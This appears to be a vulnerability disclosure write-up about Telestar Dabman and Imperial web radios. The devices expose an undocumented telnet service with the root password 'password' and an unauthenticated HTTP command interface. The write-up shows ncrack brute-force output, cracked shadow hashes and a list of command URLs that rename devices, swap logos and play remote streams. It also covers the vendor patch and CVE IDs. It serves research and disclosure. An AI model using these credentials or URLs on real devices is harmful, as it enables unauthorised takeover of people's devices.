Undocumented Telnetd & Code Execution

A few weeks ago, in the context of a security, we had carried out individual investigations following an anomaly in a private network. Web radio terminals device of the company Telestar Digital GmbH were identified, which have an undocumented telnetd server. Since this seemed strange to us, we took a closer look at the services and other functions and found something amazing.

The first thing we should talk about is what these web radios can do and where they are produced. The web radios "Dabman & Imperial" (series i & d) are distributed in Germany by Telestar Digital GmbH from Germany. At the same time the devices are traded via Ebay, Amazon by resellers in larger quantities. The end devices are offered internationally in large quantities and have e.g. a httpd web server, Web GUI, Wifi, or Bluetooth on board. The hardware of the terminals is equipped with Shenzen technology. The firmware is based on simple binaries and an embedded linux busy box from 2012 or 2014.

During the investigation of the security incident with our company, we noticed an undocumented Telnet service on the standard port 23 on the said end devices during a port scan. Since port forwarding was activated for all ports on this network, it could be addressed from the outside. Telnet services are less used today, because content is transmitted unencrypted and there are better alternatives today. Nevertheless, the protocol on network level and in end devices is still a bigger topic than originally thought.

PORT STATE SERVICE VERSION
---------------------------------
23/tcp open telnet security DVR telnetd (many brands) #Unknown Service
80/tcp open tcpwrapped web-service #Controls & Monitor - #Mobile Android / iOS App
|_http-title: AirMusic
8080/tcp open http BusyBox httpd 1.13 #Web Server

In the second step we prepared a Dabman and an Imerperial Web Radio terminal (d200 & i110) in a Wifi test network and connected them via DHCP. Then a second device was used to crack the Telnet service password via software and Bruteforce. This took only about 10 minutes and allowed us root access with full rights at the end.

NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:Program Files (x86)Ncrack>ncrack -v --user root 92.144.87.81:23
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit
Discovered credentials on telnet://92.144.87.81:23 'root' 'password'
Discovered credentials on telnet://92.144.87.81:23 'root' 'password1'
Discovered credentials on telnet://92.144.87.81:23 'root' 'password2'
Discovered credentials on telnet://92.144.87.81:23 'root' 'password123'
Discovered credentials on telnet://92.144.87.81:23 'root' 'password12'
Discovered credentials on telnet://92.144.87.81:23 'root' 'password3'
Discovered credentials on telnet://92.144.87.81:23 'root' 'password!'
telnet://92.144.87.81:23 finished. Too many failed attemps.
Discovered credentials for telnet on 92.144.87.81 23/tcp:
92.144.87.81 23/tcp telnet: 'root' 'password'
92.144.87.81 23/tcp telnet: 'root' 'password1'
92.144.87.81 23/tcp telnet: 'root' 'password2'
92.144.87.81 23/tcp telnet: 'root' 'password123'
92.144.87.81 23/tcp telnet: 'root' 'password12'
92.144.87.81 23/tcp telnet: 'root' 'password3'
92.144.87.81 23/tcp telnet: 'root' 'password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.

Cracking the password shows us some duplicates (notice: ncrack bug -> report to dev) but the final root account password which is true is "password". So after receiving the passwords there are some ways to go cause we need by for the next third step the full system passwd shadow file, the group password shadow file, usb passwd and the httpd service password with the wifi cfg. We logged into the system, requesed all information of the local smart device.

System:
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)

Kernel:
9)20151217_M8_TFT_7601_Kernel

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC:
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes

Built-in commands:
. : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait

Currently defined functions:
[, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login,
ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route,
run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
udhcpd, umount, unlzma, usleep, zcat

Then we accessed the etc path with root privileges to get the mentioned file contents. After some short minutes all data was visible to us by access with root privileges resulting from the weak password configuration.

shadow
root:r.BF8RVw56BOA:1:0:99999:7::: (decrypted: password)
ftp:!:0:::::: (decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941:::::: (decrypted: winbond)

gshadow
root:::root,mldonkey (decrypt: mldonkey)

By now we had a full access to the file system with httpd, telnet and we could as well activate the file transfer protocol. Then we watched through the local paths and one was called "UIData". In the UIData path are all the local files (binaries, xml, pictures, texts & other contents) located which are available to process the Web GUI (Port 80 & 8080). For testing we edited some of the folders, created files and modified paths to see about what we are able to change in the native source of the application. Finally we was able to edit and access everything on the box and had the ability to fully compromise the smart web radio device.

Shocked by the results, we tried to followup with the research for other critical issues.

Using the mobile application on apple ios im combination with the port scan result shows us by intuition that the air music client (mobile ios app) may be connecting on port 80 through 8080 httpd to send and receive commands. After some short time of functional tests we tried to use different http sniffer & http tamper tools to modify the get method requests on Port 80 & 8080 which we recorded ago in the dmz. One hour later we had captured all the commands send through to the web-service to trigger via client an activity or interaction.

AirMusic Status Interface: http://92.144.87.81:80
Web-Server HTTPD UIData Path: http://92.144.87.81:8080

Note: Attacks can be performed in the local network (Localhost:80) or
remotly by requesting the url remote ip adress (92.144.87.81) + forwarded remote port(Standard :23).

Get device name from Device
http://92.144.87.81:80/irdevice.xml

Set device name
http://92.144.87.81:80/set_dname?name=PWND

Set boot-logo (HTTP URL, requirement: JPG)
http://92.144.87.81:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Display or retrieve channel logo
http://92.144.87.81:80:8080/playlogo.jpg

Changing the main menu with the selected language
http://92.144.87.81:80/init?language=us

Play stream
http://92.144.87.81:80/LocalPlay?url=http://vulnerability-lab.com/stream...

Save audio file as message
http://92.144.87.81:80/LocalPlay?url=http://vulnerability-lab.com/msg.wa...

Recall channel hotkeys
http://92.144.87.81:80/hotkeylist

Current playback data
http://92.144.87.81:80/playinfo

Set volume from 0-31 & mute function
http://92.144.87.81:80/setvol?vol=10&mute=0

Reset
http://92.144.87.81:80/back

Set stop
http://92.144.87.81:80/stop

Activate all back
http://92.144.87.81:80/exit

Send keystroke combo
http://92.144.87.81:80/Sendkey?key=3

You as security researcher can see, that a remote attacker could change easily the devicename, the radio stream or leave a shocking live message / audio file. The problematic that we identified is that the web-service has not the ability to approve the authorization for transmitted commands via network. Thus allows a remote attackers to see the radio streams, listen to messages or transmit audio files as commands from the world wide web.

In the worst case a remote attacker could modify the system to spread remotly ransomware or other malformed malicious viruses / rootkits / destruktive scripts. He canaslso use the web-server to be part of a iot botnet.

In the first instance of an attack an attacker can use the undocumented ever active telnetd service to access the embed linux debian busybox by usage of the forwarded standard ports which are publicly available in a company network or by private homes. In the next step the the attacker compromises the box by infecting it with malware or by connecting it as part to a bigger botnet attack activity. Blackmailing, shocking and simple web-server defacements are also an ability for attackers to score in this special case.

We immediatly notified the prouct representatives and data security officer of the telestar company after we got aware of the vulnerable range that is affecting a huge amount of models in the imerpial and dabman webradio series. The manufacturer took the issue serious and started to produce a first solution as patch without much delay. The company itself and the data security department was not aware of the issue by any reports or writeups. The solution was that the telnetd service is being deactivated because there is no need for it anyways. The old and silly passwords are as well being removed or changed. A manual binary patch will be available for the different models of the dabman and imperial series as download from the telestar digital gmbh website. An automated update via wifi will be available for all by usage of the web radio firmware update function in the local settings menu.

1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624

Shortly after that we requested two cve ids to track down the vulnerabilities ...
1.0 - 1.1 Undocumented Telnet Service (telnetd) - Weak Passwords
1.2 AirMusic Unauthenticated Command Execution (httpd)

CVE-2019-13473
CVE-2019-13474

At the end we produced a simple research and reproduce video for the devs or research community to understand the impact.

Video:
https://www.youtube.com/watch?v=odyB15MRY3Q

Advisory:
https://www.vulnerability-lab.com/get_content.php?id=2183